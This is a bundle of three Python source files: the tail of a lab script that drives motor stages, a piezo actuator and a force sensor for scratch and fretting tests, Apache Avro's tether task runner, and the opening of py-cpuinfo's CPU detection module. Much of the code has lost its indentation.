track_length = float(input('Enter the length of the desired scratch (in mm): '))
print('You chose {} mm track length\n'.format(track_length))
print('Current X stage velocity: {} mm/s'.format(float(str(motorX.qVEL(motorX.axes))[18:-3])))
scratch_vel = float(input('Enter the motion velocity: '))
motorX.VEL(motorX.axes, scratch_vel)
print('You chose {} mm/s.\n'.format(float(str(motorX.qVEL(motorX.axes))[18:-3])))
### FRETTING ###
print('\n##############################################################')
print('Now enter the parameters for the fretting test.')
amplitude = float(input('Enter the amplitude (max amplitude is 75 µm): '))
print('You chose {} µm amplitude.\n'.format(amplitude))
frequency_input = float(input('Enter the frequency (max frequency is 100 Hz): '))
fretting_vel = (frequency_input * amplitude)
print('You chose {} Hz frequency.\n'.format(frequency_input))
cycles = float(input('Enter the desired duration of the fretting test (in cycles): '))
print('{} cycles will be done.'.format(cycles))
total_time = (cycles / frequency_input) # approximate time it takes for the fretting test
### START ###
start = int(input('Do you want to start? Enter 1 to start, enter 0 to exit. '))
time.sleep(1)
#########################################
##### FINE APPROACH TO FORCE SENSOR #####
#########################################
def fine_approach(target_load=5):
z_load_i = take_force_normal()
print('Initial normal load measurement: ', z_load_i, ' N')
if start == 1:
print ('\nStarting fine approach')
print('Current force: ', float(z_load_i), ' N') # first measurement from the force sensor (sensor zeroing reference)
current_z_load = take_force_normal() # current sensor value
print('Current load: ',current_z_load, ' N')
while (float(current_z_load) < float(target_load)):
position = float(str(motorZ.qPOS(motorZ.axes))[18:-3]) # get position
print('Current motor position: ', position)
print('\nApproaching...') # starts moving
if float(current_z_load) < (target_load * 0.4):
ztarget = position + 0.01
elif float(current_z_load) >= (target_load * 0.4) and float(current_z_load) <= (target_load * 0.90):
ztarget = position + 0.001
else:
ztarget = position + 0.0001
print('Target: ', ztarget)
motorZ.MOV(motorZ.axes, ztarget)
pitools.waitontarget(motorZ)
position = float(str(motorZ.qPOS(motorZ.axes))[18:-3])
print('New motor position: ', position)
time.sleep(0.5) # wait for 0.5 s before taking new force measurement
current_z_load = take_force_normal()
print('current load: ',current_z_load, ' N')
print('Target force reached: {}'.format(current_z_load))
time.sleep(1)
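# Hedged refactoring sketch (not called anywhere): the staged step sizes used inside
# fine_approach() can be expressed as one helper, which makes the 0.01 / 0.001 /
# 0.0001 mm thresholds easier to see and tune.
def approach_step(current_load, target_load):
    if current_load < target_load * 0.4:
        return 0.01    # far from the target load: coarse 10 um steps
    if current_load <= target_load * 0.9:
        return 0.001   # closing in: 1 um steps
    return 0.0001      # nearly there: 0.1 um steps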
### SCRATCH TEST ###
def scratch_test(track_length, scratch_vel):
print('\nStarting scratch test...')
time.sleep(0.5)
motorX.VEL(motorX.axes, scratch_vel)
motorX.MVR(motorX.axes, track_length)
time.sleep(2)
### RETURN AFTER SCRATCH ###
def scratch_return(track_length, scratch_vel):
motorX.VEL(motorX.axes, scratch_vel)
motorX.MVR(motorX.axes, -track_length)
### FRETTING TEST ###
def fretting_test(amplitude, fretting_vel, cycles):
print('\nStarting fretting test...')
global cycle_counter
cycle_counter = 0
#piezo.InterfaceSetupDlg()
piezo.ConnectUSB('0119028920')
start_fretting = datetime.now()
piezo.SVO(1, 1) # Set servo mode
piezo.MOV(1, 0) # Move to absolute position 0
print(piezo.qPOS(1)) # Query starting position
piezo.VEL(1, fretting_vel) # Set velocity to the value
print(piezo.qVEL(1)) # Query velocity
while cycle_counter < cycles:
piezo.MVR(1, amplitude)
position1 = piezo.qPOS(1)
print(position1)
piezo.MOV(1, 0)
position2 = piezo.qPOS(1)
print(position2)
cycle_counter += 1
end_fretting = datetime.now()
global fretting_runtime
fretting_runtime = (end_fretting - start_fretting).total_seconds()
print('Fretting test ran for {} seconds.'.format(fretting_runtime))
time.sleep(1)
piezo.CloseConnection()
return fretting_runtime
### ACQUIRE FORCE DATA ###
def acquire_cof():
timestamp = time.time()
start_time = timestamp
Mesfrq = 0.01
next_measurement = timestamp
duration1 = (track_length / scratch_vel) + 4
while (start_time + duration1) > time.time():
if (time.time() >= next_measurement):
next_measurement += Mesfrq
force_meas = force_sensor.ReadValue()
value_z = float('{}'.format(force_meas.getChannel3())) # normal load
value_x = float('{}'.format(force_meas.getChannel1())) # friction
force_x.append(value_x)
force_z.append(value_z)
print('\nZ value: ',value_z)
print('X value: ',value_x)
timestamp = time.time()
### CONTROL NORMAL LOAD ###
def control_normal_load(target_load):
while not is_done:
#current_time =time.time()
normal_load = take_force_normal()
if float(normal_load) < target_load:
position = float(str(motorZ.qPOS(motorZ.axes))[18:-3])
ztarget = position + 0.0001
motorZ.MOV(motorZ.axes, ztarget)
normal_load = take_force_normal()
elif float(normal_load) > target_load:
position = float(str(motorZ.qPOS(motorZ.axes))[18:-3])
ztarget = position - 0.0001
motorZ.MOV(motorZ.axes, ztarget)
normal_load = take_force_normal()
else:
return
def start_threading(target_load):
global is_done
is_done = False
### Start force control and first ECR ###
t9 = threading.Thread(target=control_normal_load, args=(target_load,))
t9.start()
t5 = threading.Thread(target=ecr, args=((5),))
t5.start()
t5.join()
time.sleep(0.2)
if not t5.is_alive():
is_done = True
### Scratch test with CoF ### No compensation
t2 = threading.Thread(target=acquire_cof)
t3 = threading.Thread(target=scratch_test, args=((track_length), (scratch_vel), ))
t2.start()
t3.start()
t3.join()
t2.join()
### Second ECR with compensation pause ###
is_done = False
t10 = threading.Thread(target=control_normal_load, args=(target_load,))
t10.start()
time.sleep(5)
normal_load = float(take_force_normal())
while normal_load < (target_load * 0.99) or normal_load > (target_load * 1.01):
time.sleep(0.5)
normal_load = float(take_force_normal())
t6 = threading.Thread(target=ecr, args=((5),))
t6.start()
t6.join()
time.sleep(0.2)
### Fretting test (compensation cont.) ###
t1 = threading.Thread(target=control_normal_load, args=(target_load,))
t1.start()
time.sleep(1)
t4 = threading.Thread(target=fretting_test, args=((amplitude), (fretting_vel), (cycles)))
t4.start()
t4.join()
time.sleep(0.2)
### Third ECR (compensation cont.) ###
t11 = threading.Thread(target=control_normal_load, args=(target_load,))
t11.start()
time.sleep(5)
t7 = threading.Thread(target=ecr, args=((5),))
t7.start()
t7.join()
time.sleep(0.2)
if not t7.is_alive():
is_done = True
### Scratch return to starting position with CoF ### No compensation
t8 = threading.Thread(target=acquire_cof)
t12 = threading.Thread(target=scratch_return, args=((track_length), (scratch_vel)))
t8.start()
t12.start()
t12.join()
t8.join()
print('Tests finished...')
### DATA TO CSV ###
def save_data():
# Electric parameters #
for x in range(len(i_meas_list)): # index with x (not x-1) so current/voltage pairs stay aligned
df_electric.loc[x, 'Current'] = i_meas_list[x][0]
df_electric.loc[x, 'Voltage'] = v_meas_list[x][0]
resist = v_meas_list[x][0] / i_meas_list[x][0]
resistance.append(resist)
df_electric['Resistance'] = resistance
# Force parameters #
for x in range(len(force_x)): # index with x (not x-1) so force readings stay aligned
df_results.loc[x, 'Force X-Axis'] = force_x[x]
df_results.loc[x, 'Force Z-Axis'] = force_z[x]
coef_of_f = force_x[x] / force_z[x]
cof.append(coef_of_f)
df_results['CoF'] = cof
amp.append(amplitude)
df_fretting['Amplitude'] = amp
freq.append(frequency_input)
df_fretting['Frequency'] = freq
dur.append(cycle_counter)
df_fretting['Cycles'] = dur
dur_time.append(fretting_runtime)
df_fretting['Fretting duration'] = dur_time
print(df_results)
print(df_fretting)
print(df_electric)
df_all_values = pd.concat([df_results,df_fretting,df_electric], ignore_index=True, axis=1)
print(df_all_values)
df_results.to_csv(r'C:\Users\Labor\Desktop\fretting_scratch_erc24.02_2.1.csv', index=False)
df_fretting.to_csv(r'C:\Users\Labor\Desktop\fretting_scratch_erc24.02_2.2.csv', index=False)
df_all_values.to_csv(r'C:\Users\Labor\Desktop\fretting_scratch_erc24.02_2.3.csv', index=False)
### Z Stage retreats ###
def retreat_stages(targetZ=10,targetX=26,vel_Z=15,vel_X=15,wait=2):
time.sleep(2)
retreat = int(input('Return stages to starting position? Enter 1 for yes, enter 0 for no: '))
if retreat == 1:
targetZ0 = -5
motorZ.MVR(motorZ.axes, targetZ0)
pitools.waitontarget(motorZ)
time.sleep(1)
motorX.VEL(motorX.axes, vel_X)
motorX.MOV(motorX.axes, targetX)
pitools.waitontarget(motorX)
print('Position X: ',float(str(motorX.qPOS(motorX.axes))[18:-3]))
motorZ.VEL(motorZ.axes, vel_Z)
motorZ.MOV(motorZ.axes, targetZ)
pitools.waitontarget(motorZ)
print('Position Z: ',float(str(motorZ.qPOS(motorZ.axes))[18:-3]))
time.sleep(wait)
fine_approach(target_load=5)
start_threading(target_load=5)
save_data()
### END PROGRAM ###
retreat_stages(targetZ=10,targetX=26,vel_Z=15,vel_X=15,wait=5)
print('Closing program...')
elapsed_time = (time.perf_counter() / 60) # rough figure only: perf_counter() counts from an arbitrary reference point
print('Elapsed time: {} min'.format(elapsed_time))
#########################################
##### CLOSES CONNECTION WITH MOTORS #####
#########################################
motorZ.CloseDaisyChain()
|
tether_task_runner.py
|
#!/usr/bin/env python
##
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import, division, print_function
import logging
import sys
import threading
import traceback
import weakref
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
import avro.tether.tether_task
import avro.tether.util
from avro import ipc
__all__ = ["TaskRunner"]
class TaskRunnerResponder(ipc.Responder):
"""
The responder for the tethered process
"""
def __init__(self,runner):
"""
Param
----------------------------------------------------------
runner - Instance of TaskRunner
"""
ipc.Responder.__init__(self, avro.tether.tether_task.inputProtocol)
self.log=logging.getLogger("TaskRunnerResponder")
# should we use weak references to avoid circular references?
# We use weak references because self.runner owns this instance of TaskRunnerResponder
if isinstance(runner,weakref.ProxyType):
self.runner=runner
else:
self.runner=weakref.proxy(runner)
self.task=weakref.proxy(runner.task)
def invoke(self, message, request):
try:
if message.name=='configure':
self.log.info("TetherTaskRunner: Recieved configure")
self.task.configure(request["taskType"],request["inSchema"],request["outSchema"])
elif message.name=='partitions':
self.log.info("TetherTaskRunner: Recieved partitions")
try:
self.task.set_partitions(request["partitions"])
except Exception as e:
self.log.error("Exception occured while processing the partitions message: Message:\n"+traceback.format_exc())
raise
elif message.name=='input':
self.log.info("TetherTaskRunner: Recieved input")
self.task.input(request["data"],request["count"])
elif message.name=='abort':
self.log.info("TetherTaskRunner: Recieved abort")
self.runner.close()
elif message.name=='complete':
self.log.info("TetherTaskRunner: Recieved complete")
self.task.complete()
self.task.close()
self.runner.close()
else:
self.log.warning("TetherTaskRunner: recieved unknown message {0}".format(message.name))
except Exception as e:
self.log.error("Error occured while processing message: {0}".format(message.name))
emsg=traceback.format_exc()
self.task.fail(emsg)
return None
def HTTPHandlerGen(runner):
"""
This is a class factory for the HTTPHandler. We need
a factory because we need a reference to the runner
Parameters
-----------------------------------------------------------------
runner - instance of the task runner
"""
if not(isinstance(runner,weakref.ProxyType)):
runnerref=weakref.proxy(runner)
else:
runnerref=runner
class TaskRunnerHTTPHandler(BaseHTTPRequestHandler):
"""Create a handler for the parent.
"""
runner=runnerref
def __init__(self,*args,**param):
"""
"""
BaseHTTPRequestHandler.__init__(self,*args,**param)
def do_POST(self):
self.responder =TaskRunnerResponder(self.runner)
call_request_reader = ipc.FramedReader(self.rfile)
call_request = call_request_reader.read_framed_message()
resp_body = self.responder.respond(call_request)
self.send_response(200)
self.send_header('Content-Type', 'avro/binary')
self.end_headers()
resp_writer = ipc.FramedWriter(self.wfile)
resp_writer.write_framed_message(resp_body)
return TaskRunnerHTTPHandler
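# Hedged illustration (not used by the module): HTTPServer instantiates the handler
# class itself, so per-runner state has to be attached to the class object rather
# than passed to __init__ - which is exactly what HTTPHandlerGen does above.
# Stripped of the tether specifics, the pattern looks like this:
def _handler_factory_sketch(runner):
    runnerref = runner if isinstance(runner, weakref.ProxyType) else weakref.proxy(runner)
    class _SketchHandler(BaseHTTPRequestHandler):
        runner = runnerref
    return _SketchHandler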
class TaskRunner(object):
"""This class ties together the server handling the requests from
the parent process and the instance of TetherTask which actually
implements the logic for the mapper and reducer phases
"""
def __init__(self,task):
"""
Construct the runner
Parameters
---------------------------------------------------------------
task - An instance of tether task
"""
self.log=logging.getLogger("TaskRunner:")
if not(isinstance(task, avro.tether.tether_task.TetherTask)):
raise ValueError("task must be an instance of tether task")
self.task=task
self.server=None
self.sthread=None
def start(self,outputport=None,join=True):
"""
Start the server
Parameters
-------------------------------------------------------------------
outputport - (optional) The port on which the parent process is listening
for requests from the task.
- This will typically be supplied by an environment variable
we allow it to be supplied as an argument mainly for debugging
join - (optional) If set to false then we don't issue a join to block
until the thread executing the server terminates.
This is mainly for debugging. By setting it to false,
we can resume execution in this thread so that we can do additional
testing
"""
port = avro.tether.util.find_port()
address=("localhost",port)
def thread_run(task_runner=None):
task_runner.server = HTTPServer(address, HTTPHandlerGen(task_runner))
task_runner.server.allow_reuse_address = True
task_runner.server.serve_forever()
# create a separate thread for the http server
sthread=threading.Thread(target=thread_run,kwargs={"task_runner":self})
sthread.start()
self.sthread=sthread
# This needs to run in a separate thread because serve_forever() blocks
self.task.open(port,clientPort=outputport)
# wait for the other thread to finish
if (join):
self.task.ready_for_shutdown.wait()
self.server.shutdown()
# should we do some kind of check to make sure it exits
self.log.info("Shutdown the logger")
# shutdown the logging
logging.shutdown()
def close(self):
"""
Handler for the close message
"""
self.task.close()
if __name__ == '__main__':
# TODO::Make the logging level a parameter we can set
# logging.basicConfig(level=logging.INFO,filename='/tmp/log',filemode='w')
logging.basicConfig(level=logging.INFO)
if (len(sys.argv)<=1):
print("Error: tether_task_runner.__main__: Usage: tether_task_runner task_package.task_module.TaskClass")
raise ValueError("Usage: tether_task_runner task_package.task_module.TaskClass")
fullcls=sys.argv[1]
mod,cname=fullcls.rsplit(".",1)
logging.info("tether_task_runner.__main__: Task: {0}".format(fullcls))
modobj=__import__(mod,fromlist=cname)
taskcls=getattr(modobj,cname)
task=taskcls()
runner=TaskRunner(task=task)
runner.start()
|
cpuinfo.py
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
# Copyright (c) 2014-2018, Matthew Brennan Jones <matthew.brennan.jones@gmail.com>
# Py-cpuinfo gets CPU info with pure Python 2 & 3
# It uses the MIT License
# It is hosted at: https://github.com/workhorsy/py-cpuinfo
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
CPUINFO_VERSION = (4, 0, 0)
import os, sys
import glob
import re
import time
import platform
import multiprocessing
import ctypes
import pickle
import base64
import subprocess
try:
import _winreg as winreg
except ImportError as err:
try:
import winreg
except ImportError as err:
pass
# Load hacks for Windows
if platform.system().lower() == 'windows':
# Monkey patch multiprocessing's Popen to fork properly on Windows Pyinstaller
# https://github.com/pyinstaller/pyinstaller/wiki/Recipe-Multiprocessing
try:
import multiprocessing.popen_spawn_win32 as forking
except ImportError as err:
try:
import multiprocessing.popen_fork as forking
except ImportError as err:
import multiprocessing.forking as forking
class _Popen(forking.Popen):
def __init__(self, *args, **kw):
if hasattr(sys, 'frozen'):
# We have to set original _MEIPASS2 value from sys._MEIPASS
# to get --onefile mode working.
os.putenv('_MEIPASS2', sys._MEIPASS)
try:
super().__init__(*args, **kw)
finally:
if hasattr(sys, 'frozen'):
# On some platforms (e.g. AIX) 'os.unsetenv()' is not
# available. In those cases we cannot delete the variable
# but only set it to the empty string. The bootloader
# can handle this case.
if hasattr(os, 'unsetenv'):
os.unsetenv('_MEIPASS2')
else:
os.putenv('_MEIPASS2', '')
forking.Popen = _Popen
class DataSource(object):
bits = platform.architecture()[0]
cpu_count = multiprocessing.cpu_count()
is_windows = platform.system().lower() == 'windows'
raw_arch_string = platform.machine()
can_cpuid = True
@staticmethod
def has_proc_cpuinfo():
return os.path.exists('/proc/cpuinfo')
@staticmethod
def has_dmesg():
return len(program_paths('dmesg')) > 0
@staticmethod
def has_var_run_dmesg_boot():
uname = platform.system().strip().strip('"').strip("'").strip().lower()
return 'linux' in uname and os.path.exists('/var/run/dmesg.boot')
@staticmethod
def has_cpufreq_info():
return len(program_paths('cpufreq-info')) > 0
@staticmethod
def has_sestatus():
return len(program_paths('sestatus')) > 0
@staticmethod
def has_sysctl():
return len(program_paths('sysctl')) > 0
@staticmethod
def has_isainfo():
return len(program_paths('isainfo')) > 0
@staticmethod
def has_kstat():
return len(program_paths('kstat')) > 0
@staticmethod
def has_sysinfo():
return len(program_paths('sysinfo')) > 0
@staticmethod
def has_lscpu():
return len(program_paths('lscpu')) > 0
@staticmethod
def has_ibm_pa_features():
return len(program_paths('lsprop')) > 0
@staticmethod
def has_wmic():
returncode, output = run_and_get_stdout(['wmic', 'os', 'get', 'Version'])
return returncode == 0 and len(output) > 0
@staticmethod
def cat_proc_cpuinfo():
return run_and_get_stdout(['cat', '/proc/cpuinfo'])
@staticmethod
def cpufreq_info():
return run_and_get_stdout(['cpufreq-info'])
@staticmethod
def sestatus_allow_execheap():
return run_and_get_stdout(['sestatus', '-b'], ['grep', '-i', '"allow_execheap"'])[1].strip().lower().endswith('on')
@staticmethod
def sestatus_allow_execmem():
return run_and_get_stdout(['sestatus', '-b'], ['grep', '-i', '"allow_execmem"'])[1].strip().lower().endswith('on')
@staticmethod
def dmesg_a():
return run_and_get_stdout(['dmesg', '-a'])
@staticmethod
def cat_var_run_dmesg_boot():
return run_and_get_stdout(['cat', '/var/run/dmesg.boot'])
@staticmethod
def sysctl_machdep_cpu_hw_cpufrequency():
return run_and_get_stdout(['sysctl', 'machdep.cpu', 'hw.cpufrequency'])
@staticmethod
def isainfo_vb():
return run_and_get_stdout(['isainfo', '-vb'])
@staticmethod
def kstat_m_cpu_info():
return run_and_get_stdout(['kstat', '-m', 'cpu_info'])
@staticmethod
def sysinfo_cpu():
return run_and_get_stdout(['sysinfo', '-cpu'])
@staticmethod
def lscpu():
return run_and_get_stdout(['lscpu'])
@staticmethod
def ibm_pa_features():
ibm_features = glob.glob('/proc/device-tree/cpus/*/ibm,pa-features')
if ibm_features:
return run_and_get_stdout(['lsprop', ibm_features[0]])
@staticmethod
def wmic_cpu():
return run_and_get_stdout(['wmic', 'cpu', 'get', 'Name,CurrentClockSpeed,L2CacheSize,L3CacheSize,Description,Caption,Manufacturer', '/format:list'])
@staticmethod
def winreg_processor_brand():
key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"Hardware\Description\System\CentralProcessor\0")
processor_brand = winreg.QueryValueEx(key, "ProcessorNameString")[0]
winreg.CloseKey(key)
return processor_brand
@staticmethod
def winreg_vendor_id():
key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"Hardware\Description\System\CentralProcessor\0")
vendor_id = winreg.QueryValueEx(key, "VendorIdentifier")[0]
winreg.CloseKey(key)
return vendor_id
@staticmethod
def winreg_raw_arch_string():
key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"SYSTEM\CurrentControlSet\Control\Session Manager\Environment")
raw_arch_string = winreg.QueryValueEx(key, "PROCESSOR_ARCHITECTURE")[0]
winreg.CloseKey(key)
return raw_arch_string
@staticmethod
def winreg_hz_actual():
key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"Hardware\Description\System\CentralProcessor\0")
hz_actual = winreg.QueryValueEx(key, "~Mhz")[0]
winreg.CloseKey(key)
hz_actual = to_hz_string(hz_actual)
return hz_actual
@staticmethod
def winreg_feature_bits():
key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"Hardware\Description\System\CentralProcessor\0")
feature_bits = winreg.QueryValueEx(key, "FeatureSet")[0]
winreg.CloseKey(key)
return feature_bits
def obj_to_b64(thing):
a = thing
b = pickle.dumps(a)
c = base64.b64encode(b)
d = c.decode('utf8')
return d
def b64_to_obj(thing):
try:
a = base64.b64decode(thing)
b = pickle.loads(a)
return b
except:
return {}
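# Hedged round-trip example (not called anywhere): these two helpers give the cpuid
# subprocess a text-safe way to hand a dict back to the parent process through a Queue.
def _b64_roundtrip_example():
    payload = obj_to_b64({'vendor_id': 'GenuineIntel'})
    return b64_to_obj(payload) == {'vendor_id': 'GenuineIntel'}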
def run_and_get_stdout(command, pipe_command=None):
if not pipe_command:
p1 = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
output = p1.communicate()[0]
output = output.decode(encoding='UTF-8')
return p1.returncode, output
else:
p1 = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
p2 = subprocess.Popen(pipe_command, stdin=p1.stdout, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
p1.stdout.close()
output = p2.communicate()[0]
output = output.decode(encoding='UTF-8')
return p2.returncode, output
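# Hedged usage example (not called anywhere): the optional pipe_command mimics a
# shell pipeline such as `dmesg | grep -i cpu` without spawning a shell.
def _run_and_get_stdout_example():
    returncode, output = run_and_get_stdout(['echo', 'hello'])
    return returncode == 0 and output.strip() == 'hello'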
def program_paths(program_name):
paths = []
exts = filter(None, os.environ.get('PATHEXT', '').split(os.pathsep))
path = os.environ['PATH']
for p in path.split(os.pathsep):
p = os.path.join(p, program_name)
if os.access(p, os.X_OK):
paths.append(p)
for e in exts:
pext = p + e
if os.access(pext, os.X_OK):
paths.append(pext)
return paths
def _get_field_actual(cant_be_number, raw_string, field_names):
for line in raw_string.splitlines():
for field_name in field_names:
field_name = field_name.lower()
if ':' in line:
left, right = line.split(':', 1)
left = left.strip().lower()
right = right.strip()
if left == field_name and len(right) > 0:
if cant_be_number:
if not right.isdigit():
return right
else:
return right
return None
def _get_field(cant_be_number, raw_string, convert_to, default_value, *field_names):
retval = _get_field_actual(cant_be_number, raw_string, field_names)
# Convert the return value
if retval and convert_to:
try:
retval = convert_to(retval)
except:
retval = default_value
# Return the default if there is no return value
if retval is None:
retval = default_value
return retval
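# Hedged worked example (not called anywhere): _get_field pulls a value out of a
# "key : value" blob such as /proc/cpuinfo output; the CPU name used here is made
# up for illustration.
def _get_field_example():
    raw = 'model name : Example CPU @ 2.20GHz\nstepping : 9\n'
    return _get_field(False, raw, None, '', 'model name')  # 'Example CPU @ 2.20GHz'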
def _get_hz_string_from_brand(processor_brand):
# Just return 0 if the processor brand does not have the Hz
if not 'hz' in processor_brand.lower():
return (1, '0.0')
hz_brand = processor_brand.lower()
scale = 1
if hz_brand.endswith('mhz'):
scale = 6
elif hz_brand.endswith('ghz'):
scale = 9
if '@' in hz_brand:
hz_brand = hz_brand.split('@')[1]
else:
hz_brand = hz_brand.rsplit(None, 1)[1]
hz_brand = hz_brand.rstrip('mhz').rstrip('ghz').strip()
hz_brand = to_hz_string(hz_brand)
return (scale, hz_brand)
def to_friendly_hz(ticks, scale):
# Get the raw Hz as a string
left, right = to_raw_hz(ticks, scale)
ticks = '{0}.{1}'.format(left, right)
# Get the location of the dot, and remove said dot
dot_index = ticks.index('.')
ticks = ticks.replace('.', '')
# Get the Hz symbol and scale
symbol = "Hz"
scale = 0
if dot_index > 9:
symbol = "GHz"
scale = 9
elif dot_index > 6:
symbol = "MHz"
scale = 6
elif dot_index > 3:
symbol = "KHz"
scale = 3
# Get the Hz with the dot at the new scaled point
ticks = '{0}.{1}'.format(ticks[:-scale-1], ticks[-scale-1:])
# Format the ticks to have 4 numbers after the decimal
# and remove any superfluous zeroes.
ticks = '{0:.4f} {1}'.format(float(ticks), symbol)
ticks = ticks.rstrip('0')
return ticks
def to_raw_hz(ticks, scale):
# Scale the numbers
ticks = ticks.lstrip('0')
old_index = ticks.index('.')
ticks = ticks.replace('.', '')
ticks = ticks.ljust(scale + old_index+1, '0')
new_index = old_index + scale
ticks = '{0}.{1}'.format(ticks[:new_index], ticks[new_index:])
left, right = ticks.split('.')
left, right = int(left), int(right)
return (left, right)
def to_hz_string(ticks):
# Convert to string
ticks = '{0}'.format(ticks)
# Add decimal if missing
if '.' not in ticks:
ticks = '{0}.0'.format(ticks)
# Remove trailing zeros
ticks = ticks.rstrip('0')
# Add one trailing zero for empty right side
if ticks.endswith('.'):
ticks = '{0}0'.format(ticks)
return ticks
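# Hedged worked example (not called anywhere) of the Hz helpers above: '2.8' at
# scale 9 (GHz) becomes the raw pair (2800000000, 0) and the friendly string
# '2.8000 GHz'; the brand string used here is made up.
def _hz_helpers_example():
    assert to_raw_hz('2.8', 9) == (2800000000, 0)
    assert to_friendly_hz('2.8', 9) == '2.8000 GHz'
    assert _get_hz_string_from_brand('Example CPU @ 2.80GHz') == (9, '2.8')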
def to_friendly_bytes(input):
if not input:
return input
input = "{0}".format(input)
formats = {
r"^[0-9]+B$" : 'B',
r"^[0-9]+K$" : 'KB',
r"^[0-9]+M$" : 'MB',
r"^[0-9]+G$" : 'GB'
}
for pattern, friendly_size in formats.items():
if re.match(pattern, input):
return "{0} {1}".format(input[ : -1].strip(), friendly_size)
return input
def _parse_cpu_string(cpu_string):
# Get location of fields at end of string
fields_index = cpu_string.find('(', cpu_string.find('@'))
#print(fields_index)
# Processor Brand
processor_brand = cpu_string
if fields_index != -1:
processor_brand = cpu_string[0 : fields_index].strip()
#print('processor_brand: ', processor_brand)
fields = None
if fields_index != -1:
fields = cpu_string[fields_index : ]
#print('fields: ', fields)
# Hz
scale, hz_brand = _get_hz_string_from_brand(processor_brand)
# Various fields
vendor_id, stepping, model, family = (None, None, None, None)
if fields:
try:
fields = fields.rsplit('(', 1)[1].split(')')[0].split(',')
fields = [f.strip().lower() for f in fields]
fields = [f.split(':') for f in fields]
fields = [{f[0].strip() : f[1].strip()} for f in fields]
#print('fields: ', fields)
for field in fields:
name = list(field.keys())[0]
value = list(field.values())[0]
#print('name:{0}, value:{1}'.format(name, value))
if name == 'origin':
vendor_id = value.strip('"')
elif name == 'stepping':
stepping = int(value.lstrip('0x'), 16)
elif name == 'model':
model = int(value.lstrip('0x'), 16)
elif name in ['fam', 'family']:
family = int(value.lstrip('0x'), 16)
except:
#raise
pass
return (processor_brand, hz_brand, scale, vendor_id, stepping, model, family)
def _parse_dmesg_output(output):
try:
# Get all the dmesg lines that might contain a CPU string
lines = output.split(' CPU0:')[1:] + \
output.split(' CPU1:')[1:] + \
output.split(' CPU:')[1:] + \
output.split('\nCPU0:')[1:] + \
output.split('\nCPU1:')[1:] + \
output.split('\nCPU:')[1:]
lines = [l.split('\n')[0].strip() for l in lines]
# Convert the lines to CPU strings
cpu_strings = [_parse_cpu_string(l) for l in lines]
# Find the CPU string that has the most fields
best_string = None
highest_count = 0
for cpu_string in cpu_strings:
count = sum([n is not None for n in cpu_string])
if count > highest_count:
highest_count = count
best_string = cpu_string
# If no CPU string was found, return {}
if not best_string:
return {}
processor_brand, hz_actual, scale, vendor_id, stepping, model, family = best_string
# Origin
if ' Origin=' in output:
fields = output[output.find(' Origin=') : ].split('\n')[0]
fields = fields.strip().split()
fields = [n.strip().split('=') for n in fields]
fields = [{n[0].strip().lower() : n[1].strip()} for n in fields]
#print('fields: ', fields)
for field in fields:
name = list(field.keys())[0]
value = list(field.values())[0]
#print('name:{0}, value:{1}'.format(name, value))
if name == 'origin':
vendor_id = value.strip('"')
elif name == 'stepping':
stepping = int(value.lstrip('0x'), 16)
elif name == 'model':
model = int(value.lstrip('0x'), 16)
elif name in ['fam', 'family']:
family = int(value.lstrip('0x'), 16)
#print('FIELDS: ', (vendor_id, stepping, model, family))
# Features
flag_lines = []
for category in [' Features=', ' Features2=', ' AMD Features=', ' AMD Features2=']:
if category in output:
flag_lines.append(output.split(category)[1].split('\n')[0])
flags = []
for line in flag_lines:
line = line.split('<')[1].split('>')[0].lower()
for flag in line.split(','):
flags.append(flag)
flags.sort()
# Convert from GHz/MHz string to Hz
scale, hz_advertised = _get_hz_string_from_brand(processor_brand)
info = {
'vendor_id' : vendor_id,
'brand' : processor_brand,
'stepping' : stepping,
'model' : model,
'family' : family,
'flags' : flags
}
if hz_advertised and hz_advertised != '0.0':
info['hz_advertised'] = to_friendly_hz(hz_advertised, scale)
info['hz_actual'] = to_friendly_hz(hz_actual, scale)
if hz_advertised and hz_advertised != '0.0':
info['hz_advertised_raw'] = to_raw_hz(hz_advertised, scale)
info['hz_actual_raw'] = to_raw_hz(hz_actual, scale)
return {k: v for k, v in info.items() if v}
except:
#raise
pass
return {}
def parse_arch(raw_arch_string):
arch, bits = None, None
raw_arch_string = raw_arch_string.lower()
# X86
if re.match('^i\d86$|^x86$|^x86_32$|^i86pc$|^ia32$|^ia-32$|^bepc$', raw_arch_string):
arch = 'X86_32'
bits = 32
